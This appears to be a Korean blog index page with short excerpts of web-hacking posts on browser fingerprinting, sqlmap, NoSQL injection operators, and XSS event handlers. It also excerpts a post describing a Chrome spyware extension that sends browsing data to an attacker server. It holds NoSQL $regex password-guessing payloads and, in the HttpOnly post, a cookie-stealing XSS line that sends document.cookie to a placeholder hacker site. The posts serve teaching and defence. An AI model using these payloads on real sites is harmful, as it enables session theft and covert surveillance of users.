본문 바로가기

728x90

🔒정보보안/웹 보안20

웹 해킹 - 브라우저 핑거프린트 확인 사이트 https://browserleaks.com/ BrowserLeaks - Web Browser Fingerprinting - Browsing Privacy BrowserLeaks.com is all about browsing privacy and web browser fingerprinting. Here you will find a gallery of web browser security testing tools that will show you what kind of personal identity data can be leaked while browsing the Internet. browserleaks.com IP 주소부터 시작해서 FLash Player, Silverlight까지 각종 브라우저의 .. 2022. 8. 27.

웹 해킹 - 클라이언트의 핑거프린트 확인하기(ClientJS) const client = new ClientJS(); client.getBrowserData(); client.getFingerprint(); client.getCustomFingerprint(...); client.getUserAgent(); client.getUserAgentLowerCase(); client.getBrowser(); client.getBrowserVersion(); client.getBrowserMajorVersion(); client.isIE(); client.isChrome(); client.isFirefox(); client.isSafari(); client.isOpera(); client.getEngine(); client.getEngineVersion(); client.g.. 2022. 8. 15.

웹 해킹 - sqlmap sqlmap은 파이썬으로 작성된 오픈 소스 SQL Injection 자동화 도구이다. MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access 등 다양한 DBMS들을 지원하고 boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band 공격 방식들을 지원한다고 한다. 이렇게나 다양한 옵션을 다 자동적으로 해주기 때문에 쓰지 않을 이유가 없다. 더 자세한 내용은 직접 공식 사이트에서 확인 가능 https://sqlmap.org/ sqlmap: automatic SQL injection and database takeover .. 2022. 7. 24.

웹 해킹 - 웹 패킷 전송 확장 프로그램 https://chrome.google.com/webstore/detail/talend-api-tester-free-ed/aejoelaoggembcahagimdiliamlcdmfm Talend API Tester - Free Edition Visually interact with REST, SOAP and HTTP APIs. chrome.google.com 웹 서버 API를 테스트할 때 도움이 되는 확장 프로그램입니다. 이전까지는 POSTMAN을 주로 사용했는데 이 녀석은 브라우저에서 조작이 가능하며, 심지어 브라우저가 가지고 있는 쿠키 값도 함께 전달이 가능합니다. 페이지에 로그인이 필요한 경우에 아주 편리합니다. 그리고 작성한 요청 정보들을 브라우저에 저장도 할 수 있음. 단점: 시크릿 모드에서 사용.. 2021. 12. 9.

웹 해킹 - NoSQL Injection 조건 표현식 https://book.hacktricks.xyz/pentesting-web/nosql-injection NoSQL injection - HackTricks Brute-force login usernames and passwords from POST login book.hacktricks.xyz [$ne] : 같지 않을 경우(not equals) [$regex] : 정규표현식 [$eq] : 같다(=) [$lt] : 작다() [$lte] : 작거나 같다() $regex로 패스워드 길이 알아내기 "password": {"$regex":".{1}"} => admin "password": {"$regex":".{2}"} => admin ... "password": {"$regex":".{5}"} => admin.. 2021. 12. 9.

웹 해킹 - 크롬 스파이웨어 확장 프로그램 , Bad Extension 크롬 확장자를 이용해 브라우저 전용 스파이웨어를 만들어보았습니다. 우선 대상의 컴퓨터에 설치를 하는 건 상상에 맡기고, 확장 프로그램을 설치하게 되면 별 다른 이상 증상은 없습니다. 확장 프로그램 아이콘을 클릭해도 별 다른 기능은 없습니다. 하지만 만약 유저가 다른 페이지로 이동을 할 경우가 생기면 공격자의 PC에는 유저가 돌아다닌 페이지의 html 파일과 스크린샷 파일을 다운로드 받게 됩니다. 원리: 공격자가 파이썬 Flask로 CDN(콘텐츠 전송 네트워크) 서버를 열게 됩니다. 이 악성 확장 프로그램은 페이지를 이동할 때마다 공격자에게 자바스크립트 콘텐츠 파일을 요구를 하게 되고, 공격자 서버는 콘텐츠를 제공을 하게 됩니다. 그 제공받는 자바스크립트 파일에는 데이터를 전송하는 ajax 스크립트와 문서.. 2021. 12. 8.

웹 해킹 - XSS 공격으로 document.cookie 정보 가져오기 방지(HttpOnly) 해커는 아래처럼 document.cookie를 통해 중요한 쿠키 정보들을 수집하는 게 일반적 location.href = 'http://해커사이트/?cookies=' + document.cookie; 서버가 클라이언트에게 쿠키 값을 지정할 때에 HttpOnly라는 옵션을 추가시켜주면, (HttpOnly가 Http만 허용하고, Https는 허용하지 않는다 이게 아니다..) 클라이언트가 document.cookie를 아무리 출력해 보아도 해당 쿠키에 대한 정보는 출력이 되지 않는다. Set-Cookie: 쿠키명=쿠키값; path=/; HttpOnly HttpOnly 설정을 한 쿠키는 브라우저가 접근을 할 수 없도록 되버린 것. 당연히 서버에게 GET, POST 요청등을 할 때에는 HttpOnly 설정된 쿠키.. 2021. 11. 25.

[WEB-HACKING] HTML 이벤트 속성 모음 & XSS 응용 아래의 이벤트 속성들은 모두 Script(자바스크립트)의 값만을 받고 있으며, 사용자가 특정 조건을 만족하게 되면 이벤트가 발생을 하게 됩니다. [Window Event Attributes] onafterprint onbeforeprint onbeforeunload onerror onhashchange onload onmessage onoffline ononline onpagehide onpageshow onpopstate onresize onstorage onunload [Form Events] onblur onchange oncontextmenu onfocus oninput oninvalid onreset onsearch onselect onsubmit [Mouse Events] onclick ond.. 2021. 11. 15.

이전 1 2 다음

728x90

티스토리툴바